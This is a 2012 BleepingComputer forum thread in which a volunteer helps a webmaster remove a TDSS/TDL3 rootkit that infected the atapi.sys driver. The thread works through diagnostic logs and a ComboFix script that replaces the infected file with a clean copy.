Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Windows7 x64: Infected, hijacked? Don't really know


  • This topic is locked This topic is locked
19 replies to this topic

#1 Stillrain

Stillrain

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 26 February 2012 - 08:06 PM

Hi!

Been having some trouble lately. I'm a webmaster, and recently a few of my websites have been infected (learn about it through Google's warnings). I fix those problems (or I thought I did), checked my machine with my anti-virus (BitDefender) and MalwareBytes AntiSpyware, and all clean, tried also Avast's aswMBR, found nothing. So, I thought all was fine, just to find out today, some unauthorized activity has been taking place on my PayPal account, someone has been transferring funds out, so, I'm really worried that my system has been compromised.

The infection on my websites according to AVG, the only website scanner that detects anything wrong, Link to Exploit Site and Blackhole Exploit Kit in case that may give you any hint.

Here's DDS log, I'm attaching also ComboFix and TDSS logs, couldn't run Rootkit Unhooker, due to it's self integrity issues, hope you can help me with this. Thanks a lot for your assistance!


.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421
Run by x-Daemon at 2:41:09 on 2012-02-27
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.34.1033.18.3957.1806 [GMT 2:00]
.
AV: BitDefender Antivirus *Disabled/Outdated* {50909708-FF80-02AF-F814-B28405891E92}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: BitDefender AntiSpyware *Disabled/Updated* {EBF176EC-D9BA-0D21-C2A4-89F67E0E542F}
FW: BitDefender Firewall *Enabled* {68AB162D-B5EF-03F7-D34B-1BB1FB5A59E9}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Program Files\BitDefender\BitDefender 2011\vsserv.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\WUDFHost.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\BitDefender\BitDefender 2011\updatesrv.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Program Files\BitDefender\BitDefender 2011\bdagent.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\Explorer.EXE
C:\Program Files\BitDefender\BitDefender 2011\pchooklaunch64.exe
C:\Program Files\BitDefender\BitDefender 2011\Antispam32\pchooklaunch32.exe
C:\Program Files (x86)\NETELLER app\NETELLER-app.exe
C:\Program Files (x86)\LaunchTab\LaunchTab.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\SearchIndexer.exe
C:\Windows\System32\alg.exe
C:\Program Files (x86)\VideoLAN\VLC\vlc.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\x-Daemon\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\conhost.exe
C:\Windows\SysWOW64\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://notfound./
mStart Page = about:blank
BHO: AutorunsDisabled - No File
BHO: Internet Explorer Form-Fill Plug-In: {5425b4b8-87f9-4e9c-8b51-8aaba82eba64} - C:\Program Files (x86)\NETELLER app\plugins\IE\Neteller.dll
TB: Bitdefender Toolbar: {381ffde8-2394-4f90-b10d-fc6124a40f8c} - C:\Program Files\BitDefender\BitDefender 2011\Antispam32\IEToolbar.dll
uRun: [NETELLER app] "C:\Program Files (x86)\NETELLER app\NETELLER-app.exe" /BOOT
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2011\Antispam32\ieshow.exe"
StartupFolder: C:\Users\x-Daemon\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\LAUNCH~1.LNK - C:\Program Files (x86)\LaunchTab\LaunchTab.exe
mPolicies-system: ConsentPromptBehaviorAdmin = 5 (0x5)
mPolicies-system: ConsentPromptBehaviorUser = 3 (0x3)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: PromptOnSecureDesktop = 0 (0x0)
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} - hxxp://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.5.3.0.cab
TCP: DhcpNameServer = 192.168.2.1
TCP: Interfaces\{D7C909BB-5170-4911-9FFB-A2252A258FE6} : DhcpNameServer = 192.168.2.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
BHO-X64: AutorunsDisabled - No File
BHO-X64: AcroIEHelperStub - No File
BHO-X64: URLRedirectionBHO - No File
BHO-X64: Internet Explorer Form-Fill Plug-In: {5425B4B8-87F9-4E9C-8B51-8AABA82EBA64} - C:\Program Files (x86)\NETELLER app\plugins\IE\Neteller.dll
BHO-X64: NetellerBHO - No File
TB-X64: Bitdefender Toolbar: {381FFDE8-2394-4F90-B10D-FC6124A40F8C} - C:\Program Files\BitDefender\BitDefender 2011\Antispam32\IEToolbar.dll
mRun-x64: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun-x64: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2011\Antispam32\ieshow.exe"
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\x-Daemon\AppData\Roaming\Mozilla\Firefox\Profiles\jqxdytkc.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/ncr
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\4.1.10111.0\npctrlui.dll
FF - plugin: C:\Users\x-Daemon\AppData\Local\Google\Update\1.3.21.79\npGoogleUpdate3.dll
FF - plugin: C:\Users\x-Daemon\AppData\Roaming\Mozilla\Firefox\Profiles\jqxdytkc.default\extensions\{1392b8d2-5c05-419f-a8f6-b9f15a596612}\plugins\np-mswmp.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll
.
============= SERVICES / DRIVERS ===============
.
R1 Bdfndisf;BitDefender Firewall NDIS 6 Filter Driver;C:\Program Files\Common Files\BitDefender\BitDefender Firewall\bdfndisf6.sys [2010-8-20 88144]
R1 bdfwfpf;bdfwfpf;C:\Program Files\Common Files\BitDefender\BitDefender Firewall\bdfwfpf.sys [2010-8-20 99408]
R1 vwififlt;Virtual WiFi Filter Driver;C:\Windows\system32\DRIVERS\vwififlt.sys --> C:\Windows\system32\DRIVERS\vwififlt.sys [?]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\system32\atiesrxx.exe --> C:\Windows\system32\atiesrxx.exe [?]
R2 Updatesrv;BitDefender Desktop Update Service;C:\Program Files\BitDefender\BitDefender 2011\updatesrv.exe [2012-1-1 53224]
R3 Acceler;Accelerometer Service;C:\Windows\system32\DRIVERS\Acceler.sys --> C:\Windows\system32\DRIVERS\Acceler.sys [?]
R3 amdkmdag;amdkmdag;C:\Windows\system32\DRIVERS\atikmdag.sys --> C:\Windows\system32\DRIVERS\atikmdag.sys [?]
R3 amdkmdap;amdkmdap;C:\Windows\system32\DRIVERS\atikmpag.sys --> C:\Windows\system32\DRIVERS\atikmpag.sys [?]
R3 bdfm;bdfm;C:\Windows\system32\DRIVERS\bdfm.sys --> C:\Windows\system32\DRIVERS\bdfm.sys [?]
R3 HECIx64;Intel® Management Engine Interface;C:\Windows\system32\DRIVERS\HECIx64.sys --> C:\Windows\system32\DRIVERS\HECIx64.sys [?]
R3 O2MDGRDR;O2MDGRDR;C:\Windows\system32\DRIVERS\o2mdgx64.sys --> C:\Windows\system32\DRIVERS\o2mdgx64.sys [?]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\system32\DRIVERS\Rt64win7.sys --> C:\Windows\system32\DRIVERS\Rt64win7.sys [?]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S3 AESTFilters;Andrea ST Filters Service;C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [2011-12-31 89600]
S3 avc3;avc3;C:\Windows\system32\DRIVERS\avc3.sys --> C:\Windows\system32\DRIVERS\avc3.sys [?]
S3 avckf;avckf;C:\Windows\system32\DRIVERS\avckf.sys --> C:\Windows\system32\DRIVERS\avckf.sys [?]
S3 MEMSWEEP2;MEMSWEEP2;\??\C:\Windows\system32\C1B7.tmp --> C:\Windows\system32\C1B7.tmp [?]
S3 nmwcdcx64;Nokia USB Generic;C:\Windows\system32\drivers\ccdcmbox64.sys --> C:\Windows\system32\drivers\ccdcmbox64.sys [?]
S3 nmwcdx64;Nokia USB Phone Parent;C:\Windows\system32\drivers\ccdcmbx64.sys --> C:\Windows\system32\drivers\ccdcmbx64.sys [?]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-1-9 174440]
S3 osppsvc;Office Software Protection Platform;C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-1-9 4925184]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\system32\drivers\rdpvideominiport.sys --> C:\Windows\system32\drivers\rdpvideominiport.sys [?]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\system32\drivers\tsusbflt.sys --> C:\Windows\system32\drivers\tsusbflt.sys [?]
S3 Update Server;BitDefender Update Server v2;C:\Program Files\Common Files\BitDefender\BitDefender Arrakis Server\bin\arrakis3.exe [2010-11-30 467248]
S3 vwifimp;Microsoft Virtual WiFi Miniport Service;C:\Windows\system32\DRIVERS\vwifimp.sys --> C:\Windows\system32\DRIVERS\vwifimp.sys [?]
S4 AdobeARMservice;Adobe Acrobat Update Service;C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2011-6-6 64952]
S4 ReflectService.exe;Macrium Reflect Image Mounting Service;C:\Program Files\Macrium Reflect\ReflectService.exe [2011-12-22 301720]
S4 SwitchBoard;SwitchBoard;C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-2-19 517096]
.
=============== Created Last 30 ================
.
2012-02-27 00:31:36 34560 ----a-w- C:\Windows\SysWow64\drivers\Normandy.sys
2012-02-27 00:31:02 -------- d-----w- C:\Windows\SysWow64\rootkitunhookeijr30
2012-02-27 00:27:17 35712 ----a-w- C:\Windows\SysWow64\drivers\BlackBox.sys
2012-02-27 00:15:01 -------- d-sh--w- C:\$RECYCLE.BIN
2012-02-27 00:03:33 0 ----a-w- C:\Windows\SysWow64\wnlogon.sys
2012-02-26 23:54:53 98816 ----a-w- C:\Windows\sed.exe
2012-02-26 23:54:53 518144 ----a-w- C:\Windows\SWREG.exe
2012-02-26 23:54:53 256000 ----a-w- C:\Windows\PEV.exe
2012-02-26 23:54:53 208896 ----a-w- C:\Windows\MBR.exe
2012-02-25 21:12:14 -------- d-----w- C:\Program Files (x86)\Free YouTube Downloader
2012-02-25 20:55:16 -------- d-----w- C:\Program Files (x86)\Conduit
2012-02-25 20:55:10 -------- d-----w- C:\Users\x-Daemon\AppData\Local\Conduit
2012-02-25 20:53:40 -------- d-----w- C:\Users\x-Daemon\AppData\Local\FLVService
2012-02-20 20:24:34 -------- d-----w- C:\Users\x-Daemon\AppData\Roaming\MarketSamurai.6E37012E1CBD7F47B14488FCC715944F3EBDCEDC.1
2012-02-20 20:23:01 -------- d-----w- C:\Program Files (x86)\MarketSamurai
2012-02-20 17:10:23 -------- d-----w- C:\Users\x-Daemon\AppData\Roaming\NETELLER app
2012-02-20 17:10:21 -------- d-----w- C:\Program Files (x86)\NETELLER app
2012-02-18 02:14:50 6144 ------w- C:\Windows\System32\C1B7.tmp
2012-02-18 02:13:39 6144 ------w- C:\Windows\System32\AA30.tmp
2012-02-18 02:13:20 -------- d-----w- C:\Program Files (x86)\Sophos
2012-02-15 01:00:59 887296 ----a-w- C:\Program Files\Internet Explorer\iedvtool.dll
2012-02-14 23:16:54 509952 ----a-w- C:\Windows\System32\ntshrui.dll
2012-02-14 23:16:54 442880 ----a-w- C:\Windows\SysWow64\ntshrui.dll
2012-02-14 23:16:48 515584 ----a-w- C:\Windows\System32\timedate.cpl
2012-02-14 23:16:48 478720 ----a-w- C:\Windows\SysWow64\timedate.cpl
2012-02-14 23:16:47 3145728 ----a-w- C:\Windows\System32\win32k.sys
2012-02-14 23:16:46 498688 ----a-w- C:\Windows\System32\drivers\afd.sys
2012-02-14 23:16:41 690688 ----a-w- C:\Windows\SysWow64\msvcrt.dll
2012-02-14 23:16:41 634880 ----a-w- C:\Windows\System32\msvcrt.dll
2012-02-12 00:58:31 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{B38F1C45-7A69-4336-80C3-CA339F28F6FB}
2012-02-12 00:57:55 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{AAEB9810-4FCD-47E6-B2D7-BE620AFBA36D}
2012-02-06 23:59:50 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A8520229-FBBE-4345-9275-D60079F806D1}
2012-02-06 23:59:32 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{C3D30DE0-FA31-464D-A9AB-F5E73680D32B}
2012-02-06 16:40:37 -------- d-----w- C:\Users\x-Daemon\AppData\Roaming\Affilorama
2012-02-06 16:40:31 -------- d-----w- C:\Program Files (x86)\Traffic Travis v4
2012-02-04 23:19:06 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A2688718-4199-459B-B418-EFA3F30C5BE6}
2012-02-04 23:18:47 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{E8E4AF41-D36E-4DCE-89A6-DC5DBE0F92EF}
2012-02-01 13:21:40 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A5D1BC02-C0A7-4508-B91E-9ACDDF683301}
2012-02-01 13:21:22 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{A1282E54-08E9-4173-AB5C-15A4E85496C7}
2012-02-01 13:21:22 -------- d-----w- C:\Users\x-Daemon\AppData\Local\{13C57D52-1D06-4E4B-AD48-63A615787450}
2012-01-29 12:33:03 -------- d-----w- C:\ProgramData\eMule
2012-01-29 12:32:38 -------- d-----w- C:\Users\x-Daemon\AppData\Local\eMule
2012-01-29 12:32:35 -------- d-----w- C:\Program Files (x86)\eMule
.
==================== Find3M ====================
.
2012-02-22 21:40:55 414368 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2012-01-06 19:21:56 31344 ----a-w- C:\Windows\System32\drivers\cnnctfy2.sys
2012-01-01 12:20:39 175616 ----a-w- C:\Windows\System32\msclmd.dll
2012-01-01 12:20:39 152576 ----a-w- C:\Windows\SysWow64\msclmd.dll
2011-12-31 23:41:37 76659 ----a-w- C:\ProgramData\bdinstall.bin
2011-12-31 22:09:19 0 ----a-w- C:\Windows\ativpsrm.bin
2011-12-22 14:54:52 13464 ----a-w- C:\Windows\System32\drivers\PSVolAcc.sys
2011-12-22 14:54:44 43672 ----a-w- C:\Windows\System32\drivers\psmounter.sys
2011-12-19 06:31:00 160256 ----a-w- C:\Windows\SysWow64\xvid.ax
2011-12-19 06:29:40 644608 ----a-w- C:\Windows\SysWow64\xvidcore.dll
2011-12-19 06:27:16 236544 ----a-w- C:\Windows\SysWow64\xvidvfw.dll
2011-12-14 07:11:03 2308096 ----a-w- C:\Windows\System32\jscript9.dll
2011-12-14 07:04:30 1390080 ----a-w- C:\Windows\System32\wininet.dll
2011-12-14 07:03:38 1493504 ----a-w- C:\Windows\System32\inetcpl.cpl
2011-12-14 06:57:28 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2011-12-14 03:04:54 1798656 ----a-w- C:\Windows\SysWow64\jscript9.dll
2011-12-14 02:57:18 1127424 ----a-w- C:\Windows\SysWow64\wininet.dll
2011-12-14 02:56:58 1427456 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2011-12-14 02:50:04 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2011-12-10 14:24:08 23152 ----a-w- C:\Windows\System32\drivers\mbam.sys
2011-12-03 06:41:18 201728 ----a-w- C:\Windows\SysWow64\mp4decoder.dll
2010-07-08 09:37:14 101544 ----a-w- C:\Program Files\Common Files\LinkInstaller.exe
.
============= FINISH: 2:43:16,83 ===============

Attached Files



BC AdBot (Login to Remove)

 


#2 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:03:49 PM

Posted 29 February 2012 - 06:42 PM

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.
  • Please subscribe to this topic, if you haven't already. Click the Watch This Topic button at the top on the right.

  • Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

  • Please reply to this post so I know you are there.
The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks :thumbup2:
Posted Image
m0le is a proud member of UNITE

#3 Stillrain

Stillrain
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 01 March 2012 - 01:28 PM

Hi m0le, I'm here, thanks!

#4 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:03:49 PM

Posted 01 March 2012 - 08:41 PM

Please note: ComboFix is an extremely powerful tool which should only be used when instructed to do so by someone who has been properly trained. ComboFix is intended by its creator to be "used under the guidance and supervision of an expert." It is NOT for private use. Please read Combofix's Disclaimer.

Using this tool incorrectly could lead to disastrous problems with your operating system such as preventing it from ever starting again.


The Combofix log shows an infected file. We will look for a back up copy to replace it first and, depending on the TDSS variant you have, we may have to search down the real core problem.

Please download SystemLook from the link below and save it to your Desktop.
Download Mirror #1
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :filefind
    atapi.sys
    
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Posted Image
m0le is a proud member of UNITE

#5 Stillrain

Stillrain
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 01 March 2012 - 09:49 PM

Hi m0le, thanks for your assistance, here's the log:


SystemLook 27.08.10 by jpshortstuff
Log created at 04:42 on 02/03/2012 by x-Daemon
Administrator - Elevation successful

========== filefind ==========

Searching for "atapi.sys"
C:\Windows\ERDNT\cache64\atapi.sys --a---- 24128 bytes [00:17 27/02/2012] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\System32\drivers\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_neutral_aad30bdeec04ea5e\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_392d19c13b3ad543\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.20575_none_39c1885e54505643\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_3b5e2d89382958dd\atapi.sys --a---- 24128 bytes [23:19 13/07/2009] [01:52 14/07/2009] 02062C0B390B7729EDC9E69C680A6F3C

-= EOF =-




So, this could be responsible for the PayPal account hijacking? Is the system and all the accounts I access through it compromised by this?

Thanks again.

Edited by Stillrain, 01 March 2012 - 09:49 PM.


#6 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:03:49 PM

Posted 02 March 2012 - 06:48 PM

Yes, the atapi.sys driver infection allows the rootkit to take over the system and TDSS is a backdoor/trojan capable of password stealing.

Because of this I have to provide this disclaimer

One or more of the identified infections is a backdoor trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.

Though the trojan has been identified and can be killed, because of it's backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall

We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do.


If you are still happy to go ahead...

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

3. Open notepad and copy/paste the text in the box below into it:

FCopy::
C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.20575_none_39c1885e54505643\atapi.sys | c:\windows\SysWow64\Drivers\atapi.sys


Save this as CFScript.txt, in the same location as Comfix.exe (called ComboFix.exe in the below graphic)


Posted Image

Refering to the picture above, drag CFScript into ComboFix.exe

If the program requests for you to update Combofix then click Yes.

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.
Posted Image
m0le is a proud member of UNITE

#7 Stillrain

Stillrain
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 02 March 2012 - 08:25 PM

Hi again m0le,

I did as you instructed, attached you'll find the log.


Just a few questions, if you'd be so kind:

- Is there any way to know what kind of TDSS it was and what data has it been sending out?

- Some of my websites are infected with this TDSS, so, after I format, is there a patch I can apply, or any kind of protection I can use before accessing my server? Else is just going to be a loop of infections, right?

- I have another computer but it was connected all the time to the infected one, trhough Windows ICS, and I also accessed the infected server from that system. So I'll assume it's also infected for now, with what software should I check it?


Thanks again for your assistance.

Attached Files



#8 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:03:49 PM

Posted 02 March 2012 - 09:04 PM

- Is there any way to know what kind of TDSS it was and what data has it been sending out?

- Some of my websites are infected with this TDSS, so, after I format, is there a patch I can apply, or any kind of protection I can use before accessing my server? Else is just going to be a loop of infections, right?

- I have another computer but it was connected all the time to the infected one, trhough Windows ICS, and I also accessed the infected server from that system. So I'll assume it's also infected for now, with what software should I check it?


- atapi.sys has been replaced and is no longer showing as infected so it's TDL3. We will run a few more scans to see whether it has brought in anything capable of the backdoor attack I posted before.

- Your websites can't be infected directly by a rootkit, it attacks the PC, but we'll take a look at that once I'm happy the main machine is clean.

- You should assume the other machine is infected and we can check that afterwards. For now, disconnect it.


If you could now run FSS

Please download Farbar Service Scanner and run it on the computer with the issue.
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.

Posted Image
m0le is a proud member of UNITE

#9 Stillrain

Stillrain
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 02 March 2012 - 09:17 PM

atapi.sys has been replaced and is no longer showing as infected so it's TDL3. We will run a few more scans to see whether it has brought in anything capable of the backdoor attack I posted before.

Well, that's great! I was reading that the variant that usually infects x64 systems is TDL4, that could contain trojans and keyloggers to steal passwords, credit cards, bank accounts, etc. Pretty scary stuff.. :o

Here's the log from FSS:

Farbar Service Scanner Version: 01-03-2012
Ran by x-Daemon (administrator) on 03-03-2012 at 04:09:44
Running from "C:\Users\x-Daemon\Desktop\RootKit LOGS\FSS"
Microsoft Windows 7 Ultimate Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Attempt to access Google IP returned error: Google IP is offline
Yahoo IP is accessible.


File Check:
========
C:\Windows\System32\nsisvc.dll => MD5 is legit
C:\Windows\System32\drivers\nsiproxy.sys => MD5 is legit
C:\Windows\System32\dhcpcore.dll => MD5 is legit
C:\Windows\System32\drivers\afd.sys => MD5 is legit
C:\Windows\System32\drivers\tdx.sys => MD5 is legit
C:\Windows\System32\Drivers\tcpip.sys => MD5 is legit
C:\Windows\System32\dnsrslvr.dll => MD5 is legit
